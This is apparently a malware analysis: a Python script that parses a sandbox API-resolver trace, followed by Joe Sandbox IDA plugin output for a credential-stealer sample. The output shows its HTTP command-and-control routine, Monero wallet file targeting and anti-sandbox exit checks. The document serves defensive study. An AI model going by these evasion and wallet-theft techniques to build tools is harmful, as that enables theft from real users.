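# Start of the highest region listed under "Memory Dump Source" in this report. A name
# pointer above it lies outside every listed region; calling that runtime heap is an inference.
LAST_DUMP_START = 0x0155B000

# Constructed excerpt: a few lines from each group of the resolver trace above.
SAMPLE = """\
• GetProcAddress.KERNEL32(77190000,01A76498), ref: 00E29F3D
• GetProcAddress.KERNEL32(77190000,01A764B8), ref: 00E29F55
• GetProcAddress.KERNEL32(77190000,01A76538), ref: 00E2A33B
• LoadLibraryA.KERNEL32(01A8D120,?,00E25EF3,00E30AEB), ref: 00E2A34D
• LoadLibraryA.KERNEL32(01A8D0A8,?,00E25EF3,00E30AEB), ref: 00E2A35E
• GetProcAddress.KERNEL32(77040000,01A762F8), ref: 00E2A3EA
• GetProcAddress.KERNEL32(6F8C0000,01A762B8), ref: 00E2A840
• GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00E2A901
• GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00E2A917
• GetProcAddress.KERNEL32(6D900000,01A8D450), ref: 00E2AA0D
"""

def _arg(tok: str) -> Union[int, str, None]:
    tok = tok.strip()
    if tok == "?":
        return None                      # not a constant at the call site
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_resolver(trace: str) -> List[dict]:
    """Call events in trace order: api, parsed args, call-site address."""
    events = []
    for line in trace.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            args = [_arg(t) for t in m.group("args").split(",")]
            events.append({"api": m.group("api"), "args": args, "ref": int(m.group("ref"), 16)})
    return events

def group_by_module(events: List[dict]) -> "OrderedDict[int, dict]":
    """Per module handle: call count, names in the clear, name pointers, and whether the
    handle was first used before any LoadLibraryA (so the module was already loaded)."""
    groups: "OrderedDict[int, dict]" = OrderedDict()
    loads_seen = 0
    for ev in events:
        if ev["api"] == "LoadLibraryA":
            loads_seen += 1
            continue
        hmod, name = ev["args"][0], ev["args"][1]
        if not isinstance(hmod, int):
            continue                     # handle not constant at the call site
        g = groups.setdefault(hmod, {"count": 0, "literal": [], "pointers": [], "preloaded": loads_seen == 0})
        g["count"] += 1
        if isinstance(name, str):
            g["literal"].append(name)
        elif isinstance(name, int):
            g["pointers"].append(name)
    return groups

def hidden_names(groups) -> Tuple[int, int]:
    """(names visible only as pointers, total GetProcAddress calls)."""
    total = sum(g["count"] for g in groups.values())
    visible = sum(len(g["literal"]) for g in groups.values())
    return total - visible, total

def report(trace: str) -> List[str]:
    events = parse_resolver(trace)
    groups = group_by_module(events)
    lib_ptrs = [e["args"][0] for e in events if e["api"] == "LoadLibraryA" and isinstance(e["args"][0], int)]
    lines = [f"LoadLibraryA calls: {len(lib_ptrs)}, {sum(p > LAST_DUMP_START for p in lib_ptrs)} "
             "with the DLL name pointer above every listed dump region"]
    for hmod, g in groups.items():
        where = "resolved before any LoadLibraryA" if g["preloaded"] else "resolved after LoadLibraryA"
        high = sum(p > LAST_DUMP_START for p in g["pointers"])
        lines.append(f"module 0x{hmod:08X} ({where}): {g['count']} names, "
                     f"{len(g['literal'])} in clear {g['literal']}, {high} via pointers above the listed dumps")
    hidden, total = hidden_names(groups)
    lines.append(f"{hidden}/{total} names not recoverable from the trace alone")
    return lines
```

On the full trace above the same code gives 102/104 hidden names, every name pointer above 0x0155B000, and the two clear-text names are exactly the ones Joe Sandbox lists under String ID for this function; the 43 calls on handle 0x77190000 all precede the first LoadLibraryA, so that module was already mapped when the resolver ran.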

                                         Control-flow Graph (rendered graph not reproduced): function 0xE148D0-0xE14FF2, the C2 request routine. InternetOpenA and StrCmpCA, then InternetConnectA, HttpOpenRequestA, a long run of string-building subcalls (0xE2ACC0, 0xE2ABB0, 0xE2AB10, 0xE2AC30) with lstrlen, HttpSendRequestA, an InternetReadFile loop and InternetCloseHandle; the StrCmpCA check, InternetConnectA and HttpOpenRequestA each have an exit edge to the InternetCloseHandle blocks at 0xE14F0E and 0xE14F1B.
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                          • Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E14965
                                        • StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E1498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E14B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E30DDE,00000000,?,?,00000000,?,",00000000,?,01A8F2C8), ref: 00E14E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E14E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E14E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E14E99
                                        • InternetCloseHandle.WININET(00000000), ref: 00E14EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 00E14F15
                                        • HttpOpenRequestA.WININET(00000000,01A8F2D8,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E14B65
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00E14F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: d02bdf0c6dc2fbc132eaf7710aab37a6df0e4dee8f49ce58ab4a45a736e64356
                                        • Instruction ID: 9847cd5dfe82dcf3c131807eba3c2c2e3357eddfe7184b48df0f8e8d82d9cfa8
                                        • Opcode Fuzzy Hash: d02bdf0c6dc2fbc132eaf7710aab37a6df0e4dee8f49ce58ab4a45a736e64356
                                        • Instruction Fuzzy Hash: 5612FC72910228ABCB15EB90ED62FEEB7B9BF14300F4855A9F10676191DF306F48CB61

                                        Control-flow Graph

                                        control_flow_graph 1090 e25760-e257c7 call e25d20 call e2ab30 * 3 call e2aa50 * 4 1106 e257cc-e257d3 1090->1106 1107 e25827-e2589c call e2aa50 * 2 call e11590 call e25510 call e2abb0 call e2ab10 call e2ade0 StrCmpCA 1106->1107 1108 e257d5-e25806 call e2ab30 call e2aab0 call e11590 call e25440 1106->1108 1134 e258e3-e258f9 call e2ade0 StrCmpCA 1107->1134 1138 e2589e-e258de call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1107->1138 1123 e2580b-e25822 call e2abb0 call e2ab10 1108->1123 1123->1134 1139 e258ff-e25906 1134->1139 1140 e25a2c-e25a94 call e2abb0 call e2ab30 * 2 call e116b0 call e2ab10 * 4 call e11670 call e11550 1134->1140 1138->1134 1142 e25a2a-e25aaf call e2ade0 StrCmpCA 1139->1142 1143 e2590c-e25913 1139->1143 1271 e25d13-e25d16 1140->1271 1161 e25be1-e25c49 call e2abb0 call e2ab30 * 2 call e116b0 call e2ab10 * 4 call e11670 call e11550 1142->1161 1162 e25ab5-e25abc 1142->1162 1146 e25915-e25969 call e2ab30 call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1143->1146 1147 e2596e-e259e3 call e2aa50 * 2 call e11590 call e25510 call e2abb0 call e2ab10 call e2ade0 StrCmpCA 1143->1147 1146->1142 1147->1142 1250 e259e5-e25a25 call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1147->1250 1161->1271 1168 e25ac2-e25ac9 1162->1168 1169 e25bdf-e25c64 call e2ade0 StrCmpCA 1162->1169 1175 e25b23-e25b98 call e2aa50 * 2 call e11590 call e25510 call e2abb0 call e2ab10 call e2ade0 StrCmpCA 1168->1175 1176 e25acb-e25b1e call e2ab30 call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1168->1176 1198 e25c66-e25c71 Sleep 1169->1198 1199 e25c78-e25ce1 call e2abb0 call e2ab30 * 2 call e116b0 call e2ab10 * 4 call e11670 call e11550 1169->1199 1175->1169 1274 e25b9a-e25bda call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1175->1274 1176->1169 1198->1106 1199->1271 1250->1142 1274->1169
                                        APIs
                                          • Part of subcall function 00E2AB30: lstrlen.KERNEL32(UO,?,?,00E14F55,00E30DDF), ref: 00E2AB3B
                                          • Part of subcall function 00E2AB30: lstrcpy.KERNEL32(00E30DDF,00000000), ref: 00E2AB95
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E258F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25AA7
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E25440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25478
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E25510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25568
                                          • Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E2557F
                                          • Part of subcall function 00E25510: StrStrA.SHLWAPI(00000000,00000000), ref: 00E255B4
                                          • Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E255D3
                                          • Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E255FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E259DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 00E25C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 9316ed9ce317fe62ccbf5908f3f8b4effa80f6739df58a7be3cf784afb2138f6
                                        • Instruction ID: 73d632e75e47e086a0a0306a02d984dac94843be862ffcdebdbaf22d85fe780e
                                        • Opcode Fuzzy Hash: 9316ed9ce317fe62ccbf5908f3f8b4effa80f6739df58a7be3cf784afb2138f6
                                        • Instruction Fuzzy Hash: 2EE160729101189BCB18FBA0F967AFD73BDAF54300F44A568F50776085EF356A48CBA2

                                        Control-flow Graph

                                        control_flow_graph 1301 e219f0-e21a1d call e2ade0 StrCmpCA 1304 e21a27-e21a41 call e2ade0 1301->1304 1305 e21a1f-e21a21 ExitProcess 1301->1305 1309 e21a44-e21a48 1304->1309 1310 e21c12-e21c1d call e2ab10 1309->1310 1311 e21a4e-e21a61 1309->1311 1312 e21a67-e21a6a 1311->1312 1313 e21bee-e21c0d 1311->1313 1315 e21b82-e21b93 StrCmpCA 1312->1315 1316 e21b63-e21b74 StrCmpCA 1312->1316 1317 e21bc0-e21bd1 StrCmpCA 1312->1317 1318 e21b41-e21b52 StrCmpCA 1312->1318 1319 e21ba1-e21bb2 StrCmpCA 1312->1319 1320 e21a85-e21a94 call e2ab30 1312->1320 1321 e21acf-e21ae0 StrCmpCA 1312->1321 1322 e21aad-e21abe StrCmpCA 1312->1322 1323 e21a71-e21a80 call e2ab30 1312->1323 1324 e21a99-e21aa8 call e2ab30 1312->1324 1325 e21b1f-e21b30 StrCmpCA 1312->1325 1326 e21bdf-e21be9 call e2ab30 1312->1326 1327 e21afd-e21b0e StrCmpCA 1312->1327 1313->1309 1350 e21b95-e21b98 1315->1350 1351 e21b9f 1315->1351 1348 e21b80 1316->1348 1349 e21b76-e21b79 1316->1349 1332 e21bd3-e21bd6 1317->1332 1333 e21bdd 1317->1333 1346 e21b54-e21b57 1318->1346 1347 e21b5e 1318->1347 1329 e21bb4-e21bb7 1319->1329 1330 e21bbe 1319->1330 1320->1313 1340 e21ae2-e21aec 1321->1340 1341 e21aee-e21af1 1321->1341 1338 e21ac0-e21ac3 1322->1338 1339 e21aca 1322->1339 1323->1313 1324->1313 1344 e21b32-e21b35 1325->1344 1345 e21b3c 1325->1345 1326->1313 1342 e21b10-e21b13 1327->1342 1343 e21b1a 1327->1343 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 e21af8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1313 1349->1348 1350->1351 1351->1313 1355->1313
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00E21A15
                                        • ExitProcess.KERNEL32 ref: 00E21A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 6741eebcd0673a1266b5610ac9f37f970f47aa82796186c1e4ac374ea485f2ad
                                        • Instruction ID: f8b19dee29f4feaa744624fb9347d3328d39f0545d5008a89d6819a7a1c04aab
                                        • Opcode Fuzzy Hash: 6741eebcd0673a1266b5610ac9f37f970f47aa82796186c1e4ac374ea485f2ad
                                        • Instruction Fuzzy Hash: 68515B78A08219EFCB14DF94E958AEE77B9EF54704F60509CE402BB240E775EA41CB61

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A814B0), ref: 00E29BF1
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81750), ref: 00E29C0A
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81468), ref: 00E29C22
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81588), ref: 00E29C3A
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81498), ref: 00E29C53
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A88958), ref: 00E29C6B
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A767B8), ref: 00E29C83
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A765F8), ref: 00E29C9C
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A814E0), ref: 00E29CB4
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A815E8), ref: 00E29CCC
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A814F8), ref: 00E29CE5
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81510), ref: 00E29CFD
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A766F8), ref: 00E29D15
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81540), ref: 00E29D2E
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E111D0: ExitProcess.KERNEL32 ref: 00E11211
                                          • Part of subcall function 00E11160: GetSystemInfo.KERNEL32(?), ref: 00E1116A
                                          • Part of subcall function 00E11160: ExitProcess.KERNEL32 ref: 00E1117E
                                          • Part of subcall function 00E11110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
                                          • Part of subcall function 00E11110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
                                          • Part of subcall function 00E11110: ExitProcess.KERNEL32 ref: 00E11143
                                          • Part of subcall function 00E11220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
                                          • Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11258
                                          • Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11266
                                          • Part of subcall function 00E11220: ExitProcess.KERNEL32 ref: 00E11294
                                          • Part of subcall function 00E26A10: GetUserDefaultLangID.KERNEL32 ref: 00E26A14
                                          • Part of subcall function 00E11190: ExitProcess.KERNEL32 ref: 00E111C6
                                          • Part of subcall function 00E279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
                                          • Part of subcall function 00E279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
                                          • Part of subcall function 00E279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F
                                          • Part of subcall function 00E27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
                                          • Part of subcall function 00E27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
                                          • Part of subcall function 00E27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01A88938,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00E26D99
                                        • Sleep.KERNEL32(00001770), ref: 00E26DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01A88938,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26DBA
                                        • ExitProcess.KERNEL32 ref: 00E26DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: ffedaffd8130eef70bb00fbde1646e94bfb2194c9388fd0992db15bc52d924a3
                                        • Instruction ID: eb7475a131fb2e341cb550e87fd07282f111d1b92120dee14747359ea979cb73
                                        • Opcode Fuzzy Hash: ffedaffd8130eef70bb00fbde1646e94bfb2194c9388fd0992db15bc52d924a3
                                        • Instruction Fuzzy Hash: D5310C71A00228ABCB04F7F0EC57AEEB7F9AF04740F586968F51276182DF746945C762

                                        Control-flow Graph

                                        control_flow_graph 1436 e11220-e11247 call e28b40 GlobalMemoryStatusEx 1439 e11273-e1127a 1436->1439 1440 e11249-e11271 call e2dd30 * 2 1436->1440 1441 e11281-e11285 1439->1441 1440->1441 1443 e11287 1441->1443 1444 e1129a-e1129d 1441->1444 1446 e11292-e11294 ExitProcess 1443->1446 1447 e11289-e11290 1443->1447 1447->1444 1447->1446
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
                                        • __aulldiv.LIBCMT ref: 00E11258
                                        • __aulldiv.LIBCMT ref: 00E11266
                                        • ExitProcess.KERNEL32 ref: 00E11294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: e1a4be6c9ea0a3f90dc8329edd0d79a73435f283606c201a985c9f755c608941
                                        • Instruction ID: 324539030445557ce363d9503e8e885b4becf935190b38c5ffb38be1e708a992
                                        • Opcode Fuzzy Hash: e1a4be6c9ea0a3f90dc8329edd0d79a73435f283606c201a985c9f755c608941
                                        • Instruction Fuzzy Hash: 8D016DB0D44318BAEF10DFE4DC4ABEEBBB8EB14705F209488E705BA1C0C6745581DB99

                                        Control-flow Graph (legend: Executed / Not Executed)
